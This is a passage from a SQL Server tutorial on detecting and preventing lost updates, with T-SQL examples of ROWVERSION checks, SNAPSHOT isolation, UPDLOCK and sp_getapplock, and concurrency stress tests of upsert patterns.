Furthermore, while updating only changed columns, while feasible, is far from an ideal solution. Let’s count how many different UPDATE statements would be required in order to modify only the columns that were actually updated on the screen. There are five columns that may be modified, which gives us a total 2^5 = 32 different update combinations. Should we generate UPDATE commands on the fly? Should we wrap 32 updates in stored procedures? Surely developing all this code manually is out of the question. Although generating such code would by quite easy, neither choice seems very attractive.

Using Concurrency Control Logic
Ultimately, any system that has the potential for ‘update conflicts’, which could result in lost updates, needs some concurrency control logic in place to either prevents such conflicts from occurring, or to determine what should happen when they do.

In previous chapters of my book, we discussed the use of isolation levels to mediate the potential interference of concurrent transactions. Unfortunately, in our bug tracking example, isolation levels alone will not help us. Although from a user’s point of view the problem is caused by “concurrent updates of the database”, from the database’s perspective the modifying transactions never overlap. The basic format of the example was:

1.Session 1 queries data into form
2.Session 2 queries same data into form
3.Sessions 2 starts transaction to update data
4.Sessions 2 completes transaction to update data
5.Session 1 starts transaction to update data
6.Sessions 1 completes transaction to update data
7.Sessions 2′s update is lost
Although the example was run in the default READ COMMITTED, the result would have been the same using any of the other transaction isolation levels. In order for isolation levels to have any effect, the transactions must overlap, and in order for that to happen, we’d need to adopt a pessimistic approach, and start the transactions much earlier, as soon as the data was queried into the form, and essentially lock the data from that point. As discussed earlier, this pessimistic approach is often not feasible in situations where data is held in user forms for a long time; to do so would inevitably grind the whole system to a halt. So, when the bug tracking system opens ticket number 123 for both Arne and Brian, it should not keep the transactions open after their screen forms have been rendered.

If it is possible to start the transactions earlier, then there may be some cases where high levels such as SERIALIZABLE, or certainly SNAPSHOT (as we will discuss shortly) can help. Note though that cannot always prevent lost updates in this manner. In our previous example, we would simply be in danger of reversing the problem, and losing Brian’s, rather than Arne’s, update.

If you wish to implement a pessimistic approach, without locking resources as soon as the data is queried, then the situation is difficult. Unfortunately, there is no built in mechanism to implement pessimistic concurrency control for longer than a lifetime of a transaction. If we need to implement such an approach, we need to roll it out ourselves. For more information on how to accomplish this, refer to the book “Expert SQL Server 2005 Development” by Adam Machanic with Hugo Kornelis and Lara Rubbelke, where the author shows how to roll out your own locks, persist them in a table, and use triggers to verify if rows to be modified are locked.

A more straightforward approach, for examples such as this, is to implement optimistic concurrency control, where we “optimistically assume” that the rows won’t be modified in the time between querying them and updating them. Of course, with no control logic, the ‘conflicting update’ just proceeds and a lost update occurs, as we saw. However, with proper application of the optimistic approach, we’d have logic in place that raised a warning and prevented the conflicting update from proceeding. So, in our previous example, at the point Brian tried to update the system, the form data would be refreshed and Brian would get a warning that the data had changed since he queried it, and his update would not proceed.

Optimistic Concurrency Control to Detect and Prevent Lost Updates
Let’s take a look at three examples of how to implement optimistic concurrency control in our bug tracking example.

Saving the original values
To detect lost updates, our code needs to “remember” the values of the columns before they were modified, and submit those old values along with the modified ones. The following, rather large, stored procedure performs the update only if no columns were changed.

CREATE PROCEDURE dbo.UpdateTicket

@TicketID INT ,

@Problem VARCHAR(50) ,

@CausedBy VARCHAR(50) ,

@ProposedSolution VARCHAR(50) ,

@AssignedTo VARCHAR(50) ,

@Status VARCHAR(50) ,

@OldProblem VARCHAR(50) ,

@OldCausedBy VARCHAR(50) ,

@OldProposedSolution VARCHAR(50) ,

@OldAssignedTo VARCHAR(50) ,

@OldStatus VARCHAR(50)

AS

BEGIN ;

SET NOCOUNT ON ;

SET XACT_ABORT ON ;

SET TRANSACTION ISOLATION LEVEL READ COMMITTED ;

BEGIN TRANSACTION ;

UPDATE dbo.Tickets

SET Problem = @Problem ,

CausedBy = @CausedBy ,

ProposedSolution = @ProposedSolution ,

AssignedTo = @AssignedTo ,

Status = @Status

WHERE TicketID = @TicketID

AND ( Problem = @OldProblem )

AND ( AssignedTo = @OldAssignedTo )

AND ( Status = @OldStatus )

– conditions for nullable columns

– CausedBy and ProposedSolution

– are more complex

AND ( CausedBy = @OldCausedBy

OR ( CausedBy IS NULL

AND @OldCausedBy IS NULL

)

)

AND ( ProposedSolution =
@OldProposedSolution

OR ( ProposedSolution IS NULL

AND @OldProposedSolution IS NULL

)

) ;

IF @@ROWCOUNT = 0

BEGIN ;

ROLLBACK TRANSACTION ;

RAISERROR(‘Ticker number %d not found
or modified after it was read’,
16, 1, @TicketID) ;

END ;

ELSE

BEGIN ;

COMMIT TRANSACTION ;

END ;

END ;

Listing 6: stored procedure only modifies if the ticket has not been changed.
As you can see by the size of this procedure, it takes a significant amount of code, both on the server and on the client, to implement this approach. Still, let’s see how it works. We’ll rerun our bug tracking example (Listings 10-3 and 10-4) using this stored procedure. First, we need to delete and reinsert test data.

DELETE FROM dbo.Tickets ;

Listing 7: Deleting modified test data.

To restore the test data, rerun Listing 2. Arne’s update, which was originally performed by Listing 3, is now submitted using the UpdateTicket stored procedure, as shown in Listing 8.

EXECUTE dbo.UpdateTicket

@TicketID = 123

,@Problem = ‘TPS report for California not working’

,@CausedBy = ‘The Customers table is empty’

,@ProposedSolution = ‘Restore Customers table
from backup’

,@AssignedTo = ‘DBA team’

,@Status = ‘Opened’

,@OldProblem = ‘TPS report for California not working’

,@OldCausedBy = NULL

,@OldProposedSolution = NULL

,@OldAssignedTo = ‘TPS report team’

,@OldStatus = ‘Opened’ ;

Listing 8: Using the UpdateTicket stored procedure to save Arne’s changes.

Brian’s update from Listing 5 is also submitted via the same stored procedure, which detects a lost update, as shown in Listing 9.

EXECUTE dbo.UpdateTicket

@TicketID = 123

,@Problem = ‘TPS report for California and Ohio
not working’

,@CausedBy = NULL

,@ProposedSolution = ‘Expose yesterdays” TPS report’

,@AssignedTo = ‘TPS report team’

,@Status = ‘Opened’

,@OldProblem = ‘TPS report for California not working’

,@OldCausedBy = NULL

,@OldProposedSolution = NULL

,@OldAssignedTo = ‘TPS report team’

,@OldStatus = ‘Opened’ ;

Msg 50000, Level 16, State 1, Procedure UpdateTicket, Line 47

Ticker number 123 modified after it was read

Listing 9: Stored procedure detects a lost update and does not save Brian’s changes.
Although this approach works in detecting and preventing lost updates, there is a more efficient one, using the ROWVERSION column.

Using ROWVERSION
A ROWVERSION column in a table is simply a column with a data type of ROWVERSION, which contains a number that auto-increments every time the row is modified. In other words, there is no way to modify a row without incrementing its ROWVERSION column. We can use this feature to detect and prevent lost updates.

In the simplest case, where we load a single row into a screen form, we can retrieve the ROWVERSION along with other columns. When we save the modified data in the database, we can match the saved ROWVERSION against the current ROWVERSION of the row that we are going to modify. If the ROWVERSION value has changed, then the row must have been modified since we read it.

In order to demonstrate this approach, we first need to add a ROWVERSION column to the Tickets table, as shown in Listing 10.

ALTER TABLE dbo.Tickets

ADD CurrentVersion ROWVERSION NOT NULL ;

Listing 10: Adding a ROWVERSION column to the Tickets table

To populate the changed table, simply rerun scripts 10-7 and 10-2. Listing 11 shows how to modify our UpdateTicket stored procedure to use the new ROWVERSION column. It compares the ROWVERSION of the row to be modified against the original ROWVERSION value, passed as a parameter, and modifies the row only if these ROWVERSION values match.

ALTER PROCEDURE dbo.UpdateTicket

@TicketID INT ,

@Problem VARCHAR(50) ,

@CausedBy VARCHAR(50) ,

@ProposedSolution VARCHAR(50) ,

@AssignedTo VARCHAR(50) ,

@Status VARCHAR(50) ,

@version ROWVERSION

AS

BEGIN ;

SET NOCOUNT ON ;

SET XACT_ABORT ON ;

SET TRANSACTION ISOLATION LEVEL READ COMMITTED ;

BEGIN TRANSACTION ;

UPDATE dbo.Tickets

SET Problem = @Problem ,

CausedBy = @CausedBy ,

ProposedSolution = @ProposedSolution ,

AssignedTo = @AssignedTo ,

Status = @Status

WHERE TicketID = @TicketID

AND CurrentVersion = @version ;

IF @@ROWCOUNT = 0

BEGIN ;

ROLLBACK TRANSACTION ;

RAISERROR(‘Ticker number %d not found
or modified after it was read’,
16, 1, @TicketID) ;

END ;

ELSE

BEGIN ;

COMMIT TRANSACTION ;

END ;

END ;

Listing 11: The UpdateTicket stored procedure saves changes only if the saved ROWVERSION matches the current ROWVERSION of the row being modified

Listing 12 shows how our new UpdateTicket stored procedure works in our bug tracking example.

DECLARE @version ROWVERSION ;

– both Brian and Arne retrieve the same version

SELECT @version = CurrentVersion

FROM dbo.Tickets

WHERE TicketID = 123 ;

– Arne saves his changes

EXECUTE dbo.UpdateTicket @TicketID = 123,

@Problem = ‘TPS report for California not working’,

@CausedBy = ‘The dbo.Customers table is empty’,

@ProposedSolution = ‘Restore dbo.Customers table from
backup’,

@AssignedTo = ‘DBA team’,

@Status = ‘Opened’,

@version = @version ;

– Brian tries to save his changes

EXECUTE dbo.UpdateTicket @TicketID = 123,

@Problem = ‘TPS report for California and Ohio not
working’,

@CausedBy = NULL,

@ProposedSolution = ‘Expose yesterdays” TPS report’,

@AssignedTo = ‘TPS report team’,

@Status = ‘Opened’,

@version = @version ;

– Verify that Arne’s changes are intact

SELECT ProposedSolution

FROM dbo.Tickets

WHERE TicketID = 123;

Msg 50000, Level 16, State 1, Procedure UpdateTicket, Line 28

Ticker number 123 not found or modified after it was read

ProposedSolution

————————————————–

Restore dbo.Customers table from backup

Listing 12: Detecting and preventing lost updates with ROWVERSION.

The stored procedure successfully saves Arne’s changes, because the row has not been changed between the time when he read the data into the bug tracker GUI, and the time when he updated the ticket.
However, when we invoke the stored procedure to save Brian’s changes, our UpdateTicket stored procedure detects that ticket 123 has been modified since Brian initially queried the data, as indicated by the fact that the value of the ROWVERSION column has changed, so the attempt to save Brian’s changes fails and a lost update is averted.

Up to now, all the cases we’ve discussed involved displaying information for the user and having the user perform some changes. Typically, in such cases, we do not keep the transaction open between the time we read a row and the time we modify it, so the only built in mechanism to detect lost updates was the ROWVERSION.

If, however, the data is modified programmatically, and quickly, then we can afford to keep the transaction open between the time we read a row and the time we modify it. In such cases, we can use Snapshot isolation to detect and prevent lost updates.
Using Snapshot Isolation level
In the first example, we’ll prevent a lost update using the SNAPSHOT isolation level. Before running the example, we need to establish some test data, as shown in Listing 13.

DELETE FROM dbo.Tickets ;

INSERT INTO dbo.Tickets

( TicketID ,

Problem ,

CausedBy ,

ProposedSolution ,

AssignedTo ,

Status

)

VALUES ( 123 ,

‘TPS report for California not working’ ,

NULL ,

‘Restored Customers table from backup’ ,

‘DBA team’ ,

‘Closed’

) ;

Listing 13: Adding test data.
Suppose that we have a process that reads tickets one-by-one, determines if they are eligible for removal from the system, and deletes those that are. Listing 14 mimics the case where this automated process has opened a transaction and read ticket number 123.

SET TRANSACTION ISOLATION LEVEL SNAPSHOT ;

SET XACT_ABORT ON ;

BEGIN TRANSACTION ;

SELECT TicketID ,

Problem ,

CausedBy ,

ProposedSolution ,

AssignedTo ,

Status

FROM dbo.Tickets

WHERE TicketID = 123 ;

/*

DELETE dbo.Tickets

WHERE TicketID = 123 ;

COMMIT TRANSACTION ;

*/

Listing 14: Opening transaction and reading ticket number 123.
At roughly the same time, another connection modifies the same ticket, as shown in Listing 15 (which should be run from a different tab).

SET NOCOUNT OFF ;

UPDATE dbo.Tickets

SET AssignedTo = ‘ETL team’ ,

CausedBy = ‘ETL truncates Customers table’ ,

Problem = ‘TPS report for California not working’ ,

ProposedSolution = ‘Fix ETL’ ,

Status = ‘Opened’

WHERE TicketID = 123 ;

Listing 15: Ticket number 123 is modified.

Clearly the situation has changed and the ticket should not be deleted. Highlight the commented DELETE statement in Listing 14 and execute it. Fortunately, under SNAPSHOT isolation, the potential lost update is detected and prevented, as shown in Listing 16.

Msg 3960, Level 16, State 2, Line 1

Snapshot isolation transaction aborted due to update conflict. You cannot use snapshot isolation to access table ‘dbo.Tickets’ directly or indirectly in database ‘Test4′ to update, delete, or insert the row that has been modified or deleted by another transaction. Retry the transaction or change the isolation level for the update/delete statement.

Listing 16: A lost update is prevented.

The initial transaction, to retrieve and then delete the ticket, fails. Note that when we started this transaction, we did nothing to prevent other connections from modifying the ticket. Instead, we chose to detect the potential problem and handle it. This is yet another typical example of optimistic concurrency control.

Note that the error message explicitly suggests that we should “Retry the transaction or change the isolation level for the update/delete statement”. However, we need to be very careful when we consider such recommendations. We need to determine which action makes sense on case- by-case basis. Here, we do not want to change the isolation level because SNAPSHOT isolation did a very good job in detecting an error that we want to avoid. Should we retry the transaction? Maybe, but not automatically: we should consider retrying the transaction only after taking into account the new changes. In this particular case, the reopened ticket 123 should stay in the system.

As we have seen, SNAPSHOT isolation is very useful for detecting lost updates in this case. However, SNAPSHOT isolation detects lost updates only for the duration of the transaction and so using this approach will not help if the transactions do not overlap, as was the case in our first example in this article (Listings 1 to 5).

Before moving on, please make sure that Snapshot isolation is disabled for your test database, as subsequent examples will run in normal, READ COMMITTED mode.

Pessimistic Concurrency Control to Prevent Lost Updates
Let’s switch our attention now to ways in which we can implement pessimistic concurrency control, to prevent lost updates. This approach is appropriate when many short transactions are attempting to simultaneously modify the same rows. We’ll discuss two approaches:
•Using the UPDLOCK hint

•Using sp_getapplock
In these examples, the data is read and modified by a program, without any human interaction, and in a very short time. In such cases it is feasible to read and modify within the same transaction.

Again, these approaches only help us deal with concurrency for the duration of a transaction; they cannot prevent lost updates when transactions do not overlap. As such, they usually should not be used when users open screen forms to edit data and save their modifications at different times, because from the database’s point of view these modifications are not concurrent.

Serializing updates with UPDLOCK hint
We’ll rerun the ticket deletion/archive example using UPDLOCK hint instead of SNAPSHOT isolation level. First, rerun the script from Listing 13 to restore the modified data to its original state. Next, in one SSMS tab, retrieve the ticket 123 in a transaction under READ COMMITTED isolation level and using the UPDLOCK hint, as shown in Listing 17.

SET TRANSACTION ISOLATION LEVEL READ COMMITTED ;

SET XACT_ABORT ON ;

BEGIN TRANSACTION ;

SELECT TicketID ,

Problem ,

CausedBy ,

ProposedSolution ,

AssignedTo ,

Status

FROM dbo.Tickets WITH(UPDLOCK)

WHERE TicketID = 123 ;

–DELETE dbo.Tickets

–WHERE TicketID = 123 ;

–COMMIT TRANSACTION ;

Listing 17. Reading ticket 123 with UPDLOCK hint.

As in the previous example, modify the ticket being archived (deleted) in another tab, as per Listing 15.

Unlike in the previous example, this time the modification does not complete; it stays in lock-waiting state, as it is blocked by our outstanding transaction in the first tab. At the beginning of the transaction in the first tab, we selected data for ticket 123, and the UPDLOCK hint guarantees that this data cannot be modified by other connections for the life of the transaction, though it can still be read.

Return to the first tab and uncomment and run the DELETE statement, in order to delete ticket 123 and commit the transaction. The second tab will now finish too, but the row that was targeted by the UPDATE no longer exists, so it could not be updated.

As we have seen, UPDLOCK hint has prevented the second update from modifying ticket 123. This is typical of pessimistic concurrency control solutions.

The UPDLOCK hint is best-suited to cases where our modifications are simple and short. In this example, we were dealing with a single row modification, and UPDLOCK hint works perfectly well. However, if we need to touch multiple rows, maybe in more than one table, and we hold locks for the duration of a long transaction, then our modifications are very prone to deadlocks (as demonstrated in Chapter 9 of my book).

The need to modify multiple rows in multiple tables in one transaction is very common. For example, saving a screen form with a customer’s order may result in inserting or updating rows in Orders, OrderItems, and OrderComments tables. In such cases, we can still use the locks that are implicitly acquired as the transaction progresses, and we can use UPDLOCK hints to get a better control over locking. This approach can work but is complex, as we often have to consider many possible combinations of different modifications, all occurring at the same time.

There is a simpler alternative in such cases: at the very beginning of our transaction, we can explicitly acquire one application lock for the whole Order object, which spans several rows in the involved tables, Orders, OrderItems, and OrderComments. Let’s see how it works.

Using sp_getapplock to prevent collisions

In this example, our transactions will explicitly acquire an application lock, using sp_getapplock. This effectively serializes modifications, because only one connection can hold an exclusive application lock on the same resource. Other modifications to the same data will be forced to wait for that lock to be released, so there will be no collisions whatsoever. This is an example of pessimistic concurrency control, used to its fullest extent.

Note that application locks are different from other locks in that:
•The resource they lock is not a row or a page or a table but a name, as will be demonstrated in the following example.
•They are acquired explicitly, rather than implicitly
Note that when transactions commit or rollback, all application locks are released, so they must be acquired in the context of an outstanding transaction, after we have explicitly started the transaction.
To demonstrate this approach, we first need to restore the modified data to its original state (Listing 13). Next, from one SSMS tab, begin a transaction, acquire an application lock, and start archiving the ticket 123, as shown in Listing 18.
– run this script in the first tab

SET TRANSACTION ISOLATION LEVEL READ COMMITTED ;

BEGIN TRANSACTION ;

DECLARE @ret INT ;

SET @ret = NULL ;

EXEC @ret = sp_getapplock @Resource = ‘TicketID = 123′,

@LockMode = ‘Exclusive’, @LockTimeout = 1000 ;

– sp_getapplock return code values are:

– >= 0 (success), or < 0 (failure)

IF @ret < 0 BEGIN; RAISERROR(‘Failed to acquire lock’, 16, 1) ; ROLLBACK ; END ; –DELETE dbo.Tickets –WHERE TicketID = 123 ; –COMMIT TRANSACTION ; Listing 18: Begin a transaction and acquire an application lock. After running the script, uncomment and highlight the DELETE and COMMIT commands at the bottom, but do not execute them just yet. In a second tab, we’ll attempt to acquire an exclusive application lock and modify the same ticket, as shown in Listing 19. — run this script in the second tab SET TRANSACTION ISOLATION LEVEL READ COMMITTED ; BEGIN TRANSACTION ; DECLARE @ret INT ; SET @ret = NULL ; — The @LockTimeout setting makes sp_getapplock — wait for 10 seconds for other connections — to release the lock on ticket number 123 EXEC @ret = sp_getapplock @Resource = ‘TicketID = 123′, @LockMode = ‘Exclusive’, @LockTimeout = 10000 ; — sp_getapplock return code values are: — >= 0 (success), or < 0 (failure)

IF @ret < 0

BEGIN ;

RAISERROR(‘Failed to acquire lock’, 16, 1) ;

ROLLBACK ;

END ;

ELSE

BEGIN ;

UPDATE dbo.Tickets

SET AssignedTo = ‘TPS report team’ ,

CausedBy = ‘Bug in TPS report’ ,

Problem = ‘TPS report truncates
dbo.Customers’ ,

ProposedSolution = ‘Fix TPS report’ ,

Status = ‘Reopen’

WHERE TicketID = 123 ;

IF @@ROWCOUNT = 0

BEGIN ;

RAISERROR(‘Ticket not found’, 16, 1) ;

END ;

COMMIT ;

END ;

Listing 19: Begin a transaction, attempt to acquire an application lock and modify the ticket being archived, if the application lock has been acquired

Immediately return to the first tab and run the highlighted DELETE statement; this script will raise a ‘Ticket not found’ error. If we wait longer than 10 seconds before trying to run this DELETE, then Listing 19 will raise a ‘Failed to acquire lock’ error. Either way, lost updates have been prevented.

This proves that if all modifications that wish to modify a ticket are programmed to acquire the corresponding application lock before touching it, then lost updates cannot occur. However, this approach only works if all modifications are programmed to acquire application locks. A failure to acquire an application lock, whether by accident or deliberately, bypasses our protection, and as such may result in lost updates or other problems, such as deadlocks.
To demonstrate this, restore the original data, comment out the command that invokes sp_getapplock, in Listing 19, and then rerun the same example, as follows:

•In Listing 18, make sure that DELETE and COMMIT command are commented out.
•Run Listing 18
•In a second tab run Listing 19
•Return to Listing 19, uncomment the DELETE and COMMIT commands at the bottom, highlight them, and execute them.
When the DELETE completes, you’ll find that ticket number 123 is gone, which means that we’ve suffered a lost update. In short, sp_getapplock is only useful when it is consistently used by all relevant modifications. If such consistency is not possible, we will need to use other methods.

T-SQL Patterns that Fail High Concurrency Stress Tests
In many cases, our T-SQL code works perfectly well when we execute it from one connection at a time, but intermittently fails when it runs in production systems, under high concurrency.
In this section, we’ll examine the following two common T-SQL patterns and prove that they are generally unreliable under concurrent loads:
•IF EXISTS(…) THEN
•UPDATE … IF (@@ROWCOUNT = 0) BEGIN
We’ll then examine a third technique, MERGE, which is robust under concurrency.

The most important lesson to be learned is that if our code is supposed to run under high concurrency, then we need to stress test under such loads, and against realistic data volumes. If our production table has about 10M rows, we should not run our tests against a tiny table of just 100 rows.
Important Note: If any of these scripts in this section run for too long on your server, and you cancel them, make sure to close the tabs or rollback the transactions. Otherwise, you could end up with an outstanding transaction holding locks, and subsequent examples may not work as expected.

Problems with IF EXISTS(…) THE
The IF EXISTS(…) THEN pattern, as follows, is quite common and yet it frequently fails under high concurrency.

IF EXISTS(–enter some condition here
) BEGIN ;
– perform some action here
END ;

Before we prove that the technique will cause our optimistic concurrency solution (using the ROWVERSION column) to fail under heavy concurrent loads, let’s first examine a much simpler example, which demonstrates the general problem with this pattern.

May cause Data Integrity Issues under Concurrent Access

To keep the example as simple and short as possible, we’ll use a table with just four columns, as shown in Listing 20.
CREATE TABLE dbo.WebPageStats

(

WebPageID INT NOT NULL PRIMARY KEY,

NumVisits INT NOT NULL ,

NumAdClicks INT NOT NULL ,

version ROWVERSION NOT NULL

) ;

GO

SET NOCOUNT ON ;

INSERT INTO dbo.WebPageStats

( WebPageID, NumVisits, NumAdClicks )

VALUES ( 0, 0, 0 ) ;

DECLARE @i INT ;

SET @i = 1 ;

WHILE @i < 1000000

BEGIN ;

INSERT INTO dbo.WebPageStats

( WebPageID ,

NumVisits ,

NumAdClicks

)

SELECT WebPageID + @i ,

NumVisits ,

NumAdClicks

FROM dbo.WebPageStats ;

SET @i = @i * 2 ;

END ;

GO

Listing 20: Create and populate the WebPageStats table

We’ll INSERT or UPDATE rows in a loop using the following simple logic, as expressed in Listing 21: if a row with given ID exists, update it; otherwise insert a new one. Cut and paste this code into two tabs, switch each tab into text mode, and run the code simultaneously in each tab.

– hit Ctrl+T to execute in text mode

SET NOCOUNT ON ;

DECLARE @WebPageID INT ,

@MaxWebPageID INT ;

SET @WebPageID = 0 ;

SET @MaxWebPageID = ( SELECT MAX(WebPageID)

FROM dbo.WebPageStats

) + 100000 ;

WHILE @WebPageID < @MaxWebPageID

BEGIN ;

SET @WebPageID = ( SELECT MAX(WebPageID)

FROM dbo.WebPageStats

) + 1 ;

BEGIN TRY ;

BEGIN TRANSACTION ;

IF EXISTS ( SELECT *

FROM
dbo.WebPageStats –WITH(UPDLOCK)

WHERE WebPageID = @WebPageID )

BEGIN ;

UPDATE dbo.WebPageStats

SET NumVisits = 1

WHERE WebPageID = @WebPageID ;

END ;

ELSE

BEGIN ;

INSERT INTO dbo.WebPageStats

( WebPageID, NumVisits, NumAdClicks )

VALUES ( @WebPageID, 0, 0 ) ;

END ;

COMMIT TRANSACTION ;

END TRY

BEGIN CATCH ;

SELECT ERROR_MESSAGE() ;

ROLLBACK TRANSACTION ;

END CATCH ;

END ;

Listing 21: Inserting or updating rows in a loop
You should see PRIMARY KEY violations. You may be wondering if our pessimistic technique, using UPDLOCK, would help us out here: unfortunately it won’t. To try this out, uncomment the hint, comment out all BEGIN/COMMIT/ROLLBACK TRANSACTION commands, and re-run the test. You will still see PK violations. The UPDLOCK does not help as there is no row to be locked if the NOT EXISTS is true. So if both connections simultaneously check for existence of the same row, both will find it does not exist (so they won’t acquire a U lock), and both will try to INSERT the row, leading to the violation.

The most important point to remember is that code that performs perfectly in single-user test cases, may behave very differently under when multiple processes are attempting to access and modify the same data. The defensive programmer must test on a case-by-case basis, and test as many different scenarios as possible. With that in mind, I encourage you to play with this simple example a little bit, exploring how small changes affect the behavior of our code under high concurrency. For example:
•Increase the isolation level in one or both tabs, and see how that affects the behavior.
•Run different scripts in the tabs, such as with commented hint in one tab and uncommented in another, and see what happens.
May Break Optimistic Concurrency Solutions
Having demonstrated how unreliable the IF EXISTS pattern may be when it executes under high concurrency, let’s now prove that it will cause our optimistic concurrency solution to fail, under similarly high concurrency.

We’ll develop a stored procedure to update the WebPageStats table and then execute it in rapid succession, from two connections. Of course, we could do the same thing with UpdateTickets procedure, but these examples involving loops are quite large, so I decided to use a narrower WebPageStats table just to keep the examples shorter.

Listing 22 shows the UpdateWebPageStats stored procedure, which will detect any version mismatches when it saves changes.

CREATE PROCEDURE dbo.UpdateWebPageStats

@WebPageID INT ,

@NumVisits INT ,

@NumAdClicks INT ,

@version ROWVERSION

AS

BEGIN ;

SET NOCOUNT ON ;

SET TRANSACTION ISOLATION LEVEL READ COMMITTED ;

SET XACT_ABORT ON ;

DECLARE @ret INT ;

BEGIN TRANSACTION ;

IF EXISTS ( SELECT *

FROM dbo.WebPageStats

WHERE WebPageID = @WebPageID

AND version = @version )

BEGIN ;

UPDATE dbo.WebPageStats

SET NumVisits = @NumVisits ,

NumAdClicks = @NumAdClicks

WHERE WebPageID = @WebPageID ;

SET @ret = 0 ;

END ;

ELSE

BEGIN ;

SET @ret = 1 ;

END ;

COMMIT ;

RETURN @ret ;

END ;

Listing 22: Create the dbo.UpdateWebPageStats stored procedure
Of course, before testing how the stored procedure works under concurrency, we should make sure that it works without it. Testing the stored procedure without concurrency is left as an exercise for the reader.
The following two scripts will invoke the WebPageStats stored procedure multiple times in loops. Running these two scripts simultaneously from two connections will expose WebPageStats to high concurrency, and we shall see how it holds up.

The first script, in Listing 23, increments the column NumVisits for a single row, and does so 100,000 times, in a loop. Cut-and-paste this code into a tab, but do not run it yet.

DECLARE @NumVisits INT ,

@NumAdClicks INT ,

@version ROWVERSION ,

@count INT ,

@ret INT ;

SET @count = 0 ;

WHILE @count < 10000

BEGIN ;

SELECT @NumVisits = NumVisits + 1 ,

@NumAdClicks = NumAdClicks ,

@version = version

FROM dbo.WebPageStats

WHERE WebPageID = 5 ;

EXEC @ret = dbo.UpdateWebPageStats 5,

@NumVisits, @NumAdClicks, @version ;

IF @ret = 0

SET @count = @count + 1 ;

END ;

Listing 23: A loop that invokes UpdateWebPageStats to increment NumVisits for one and the same row 10,000 times in a loop

Our second script, in Listing 24, increments another column, NumAdClicks, also 10,000 times in a loop. Cut-and-paste it into a second tab and run both scripts simultaneously.

DECLARE @NumVisits INT ,

@NumAdClicks INT ,

@version ROWVERSION ,

@count INT ,

@ret INT ;

SET @count = 0 ;

WHILE @count < 10000

BEGIN ;

SELECT @NumVisits = NumVisits ,

@NumAdClicks = NumAdClicks + 1 ,

@version = version

FROM dbo.WebPageStats

WHERE WebPageID = 5 ;

EXEC @ret = dbo.UpdateWebPageStats 5,

@NumVisits, @NumAdClicks, @version ;

IF @ret = 0

SET @count = @count + 1 ;

END ;

Listing 24: A loop that invokes UpdateWebPageStats to increment NumAdClicks for the same row 10,000 times in a loop

These scripts may take some time to complete. When both scripts finish, we would expect both NumVisits and NumAdClicks to have the same value of 10,000. However, this is not the case, as Listing 25 demonstrates. Each time we run these two scripts, we will get different numbers but, every time, neither column will have the expected value of 10000.

SELECT NumVisits ,

NumAdClicks

FROM dbo.WebPageStats

WHERE WebPageID = 5 ;

NumVisits NumAdClicks

———– ———–

9999 1056

Listing 25: NumVisits and NumAdClicks should both be 10000, but they do not have the expected values

As we can see, NumVisits and NumAdClicks do not have the expected value of 10,000. This means that many updates were lost. How could that happen? Suppose that both connections retrieve the version at approximately the same time, and then invoke the same stored procedure at approximately the same time. Clearly in both executions the condition in the IF statement evaluates as TRUE. As a result, both executions will enter the branch with the UPDATE command.

UPDATE commands will execute one after another, and the second one will overwrite the changes of the first one, because the ROWVERSION value is not tested again in the actual UPDATE statement. Adding this test to the UPDATE will not help, though. If we do that, then the first one will increment the ROWVERSION value, and the second one will not update the row at all because the condition (version = @version) in the WHERE clause will return FALSE, but the procedure will still return 0 to indicate success to the caller even though the requested update was not made, and the caller will not try the update again.

UPDATE … IF (@@ROWCOUNT = 0) BEGIN

Another common approach is to attempt, first, to UPDATE an existing row that matches the search criteria, and if there is no matching row, then INSERT a new row. It is also unreliable.

In order to demonstrate this, we need to modify our loop from Listing 21 so that it uses the UPDATE …IF (@@ROWCOUNT = 0) BEGIN pattern, as shown in Listing 26.

– hit Ctrl+T to execute in text mode

SET NOCOUNT ON ;

DECLARE @WebPageID INT ,

@MaxWebPageID INT ;

SET @WebPageID = 0 ;

SET @MaxWebPageID = ( SELECT MAX(WebPageID)

FROM dbo.WebPageStats

) + 100000 ;

WHILE @WebPageID < @MaxWebPageID

BEGIN ;

SET @WebPageID = ( SELECT MAX(WebPageID)

FROM dbo.WebPageStats

) + 1 ;

BEGIN TRY ;

BEGIN TRANSACTION ;

UPDATE dbo.WebPageStats

SET NumVisits = 1

WHERE WebPageID = @WebPageID ;

IF ( @@ROWCOUNT = 0 )

BEGIN ;

INSERT INTO dbo.WebPageStats

( WebPageID, NumVisits, NumAdClicks )

VALUES ( @WebPageID, 0, 0 ) ;

END ;

COMMIT TRANSACTION ;

END TRY

BEGIN CATCH ;

SELECT ERROR_MESSAGE() ;

ROLLBACK TRANSACTION ;

END CATCH ;

END ;

Listing 26: A loop that uses the UPDATE … IF (@@ROWCOUNT = 0) pattern

When we run script 10-26 simultaneously from two tabs, we get PRIMARY KEY violations, just as when we ran script 10-21 in our previous example.

In short, the UPDATE…IF (@@ROWCOUNT = 0) pattern is also unreliable under high concurrency. As before, we can (and should!) try out different isolation levels and hints. For example, I encourage you to add WITH(SERIALIZABLE) hint to the UPDATE command and see what happens. This is left as an advanced exercise for the readers.

Stress Testing the MERGE Command
If we are running SQL Server 2008, we can use the MERGE command to implement the same logic i.e. UPDATE rows if they exist, otherwise INSERT. In the context of our loop, MERGE may also intermittently fail but, with the help of a hint, it always completes without a single error. Let’s modify the script 10-26 to use MERGE command, as shown in Listing 27.

– hit Ctrl+T to execute in text mode

SET NOCOUNT ON ;

DECLARE @WebPageID INT ,

@MaxWebPageID INT ;

SET @WebPageID = 0 ;

SET @MaxWebPageID = ( SELECT MAX(WebPageID)

FROM dbo.WebPageStats

) + 100000 ;

WHILE @WebPageID < @MaxWebPageID

BEGIN ;

SET @WebPageID = ( SELECT MAX(WebPageID)

FROM dbo.WebPageStats

) + 1 ;

BEGIN TRY ;

BEGIN TRANSACTION ;

MERGE dbo.WebPageStats –WITH (HOLDLOCK)

AS target

USING

( SELECT @WebPageID

) AS source ( WebPageID )

ON (target.WebPageID = source.WebPageID)

WHEN MATCHED

THEN

UPDATE SET NumVisits = 1

WHEN NOT MATCHED

THEN

INSERT( WebPageID, NumVisits,
NumAdClicks )

VALUES

( @WebPageID ,

0 ,

0

) ;

COMMIT TRANSACTION ;

END TRY

BEGIN CATCH ;

SELECT ERROR_MESSAGE() ;

ROLLBACK TRANSACTION ;

END CATCH ;

END ;

Listing 27: Implement our loop using the MERGE command

When we run this script in two tabs at the same time, we should get PRIMARY KEY violations. As usual, if we cancel a query, we must make sure to commit or rollback the outstanding transaction in that tab.

